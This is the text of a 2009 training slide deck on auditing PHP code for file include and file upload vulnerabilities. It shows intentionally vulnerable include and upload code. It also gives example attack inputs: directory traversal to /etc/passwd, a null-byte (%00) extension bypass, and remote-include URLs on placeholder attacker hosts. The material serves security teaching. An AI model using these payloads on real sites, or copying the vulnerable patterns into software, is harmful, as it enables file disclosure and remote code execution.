1. ©2009 Justin C. Klein Keane PHP Code Auditing Session 4.2 – File Include Vulnerabilities Justin C. Klien Keane jukeane@sas.upenn.edu

2. ©2009 Justin C. Klein Keane File Include Vulnerabilities Arbitrary file includes (reading)  Local file includes  Remote file includes Directory traversal Writing arbitrary files

3. ©2009 Justin C. Klein Keane Basic PHP File Includes Four common functions  include()  include_once()  require()  require_once() Difference is that require will die (with fatal E_ERROR) if the specified file is not found  Include() will produce an E_WARNING _once functions will not re-include the file if it has already been called

4. ©2009 Justin C. Klein Keane How Includes Work When PHP includes a file it will parse any PHP code within that file Anything not delimited with the PHP delimiters (“ ”) will be treated as plain text Plain text will simply be rendered inline

5. ©2009 Justin C. Klein Keane Typical Include <?php include_once('header.php'); include_once($_GET['action']. '.php'); include_once('footer.php'); ?>

6. ©2009 Justin C. Klein Keane Problems with Includes Arbitrary local file includes triggered via malicious user input: If user supplies “../../../../../../../etc/passwd” as the 'action' URL variable that file will be rendered during page display!

7. ©2009 Justin C. Klein Keane Incorrect Projection Schemes Some programmers will append a file extension to attempt to limit includes like /etc/passwd This fails for several reasons, one is because PHP is written in C

8. ©2009 Justin C. Klein Keane Caveats of C C doesn't have a string type Instead strings are null terminated character arrays: char foo[3]; int main() { foo[0] = 'B'; foo[1] = 'A'; foo[2] = 'R'; foo[3] = '\0'; } Without the null at the end the “string” would have no end  C reads from the start of the string until it reaches the null character when printing strings

9. ©2009 Justin C. Klein Keane Tricking PHP with C Conventions Using a null character triggers C constructs and defeats the prior example If user passes in: action=../../../../../../etc/passwd%00 then PHP executes: include('inc/../.././../../etc/passwd'); Because PHP terminates the string at the null bit (and ignores the appended '.php') Most PHP programmers are unaware of this!

10. ©2009 Justin C. Klein Keane Other Include Strategies There are other ways around extension protections Attacker can provide the GET var: ?action=/path/to/other/php_file.php? renders the final “.php” as a GET var to the included php_file.php

11. ©2009 Justin C. Klein Keane Other Dangers of Includes Often times include files are meant to be included Include files live on the filesystem though May contain vulnerabilities when called directly as variables could be redefined or arbitrarily defined Especially dangerous when register_globals is on!

12. ©2009 Justin C. Klein Keane Example Main file: <?php $style_dir='images/'; include_once('header.php'); [...] Include file: Foo Site @import url(“ style.css”); What happens when an attacker calls: http://sitename.tld/header.php?style_dir=http://myEvilSite.tld/css/

13. ©2009 Justin C. Klein Keane Remote File Include Rather than specifying a local resource, an attacker could specify a remote file for inclusion Remote files must be served as plain text, rather than compiled PHP Remote text is pulled for inclusion then the local PHP compiler interprets the text, rendering the PHP locally

14. ©2009 Justin C. Klein Keane Remote File Include Requirements /etc/php.ini has parameters that define the ability of PHP to include files: ;;;;;;;;;;;;;;;;;; ; Fopen wrappers ; ;;;;;;;;;;;;;;;;;; ; Whether to allow the treatment of URLs (like http:// or ftp://) as files. allow_url_fopen = On

15. ©2009 Justin C. Klein Keane If allow_url_fopen is On Attackers can include remote files: Attacker can call ?action=http://evilSite.tld/evil_script.txt?

16. ©2009 Justin C. Klein Keane Other Include Strategies Attackers can use includes to bypass direct access restrictions such as.htaccess  This could be used to expose files like config.ini files Attackers can include Apache files like.htpasswd or.htaccess files which are included as plain text, exposing their contents Attackers can subvert program flow by calling files that are normally not included Attackers can call files readable by Apache, such as files in /tmp which may contain sensitive data (like session cookies or malicious uploads)

17. ©2009 Justin C. Klein Keane Writing Files PHP functionality used to write files include:  File upload functions built into an application (such as image uploads)  Utilizing PHP filesystem commands such as fwrite()

18. ©2009 Justin C. Klein Keane Typical Image Upload Handler $upload_dir = "files/"; $filename = basename($_FILES['form_filename']['name']); $target = $upload_dir. $filename; if(move_uploaded_file($_FILES['form_filename']['tmp_name'], $target)) { echo $filename. " has been uploaded"; } else{ echo "Error uploading file!"; }

19. ©2009 Justin C. Klein Keane Common Upload Errors Collisions cause overwrites File type is not checked  Programmer may assume only image files are being uploaded, but this isn't enforced File type is checked inappropriately  Simply checking $_FILES['upload_file']['type'] is insufficient since this is a browser provided parameter Double extensions (and programmer only check the first one)

20. ©2009 Justin C. Klein Keane Exploits for File Uploads Attacker uploads a PHP file which contains a backdoor or exposes other system files Attacker uploads a.htaccess file overwriting Apache rules Attacker overwrites existing files to insert a backdoor

21. ©2009 Justin C. Klein Keane Fwrite() The fwrite() function is a built in function that allows Apache to write to file handles Often used in installers to write config files Also commonly used for logging For more information see: http://us3.php.net/manual/en/function.fwrite.php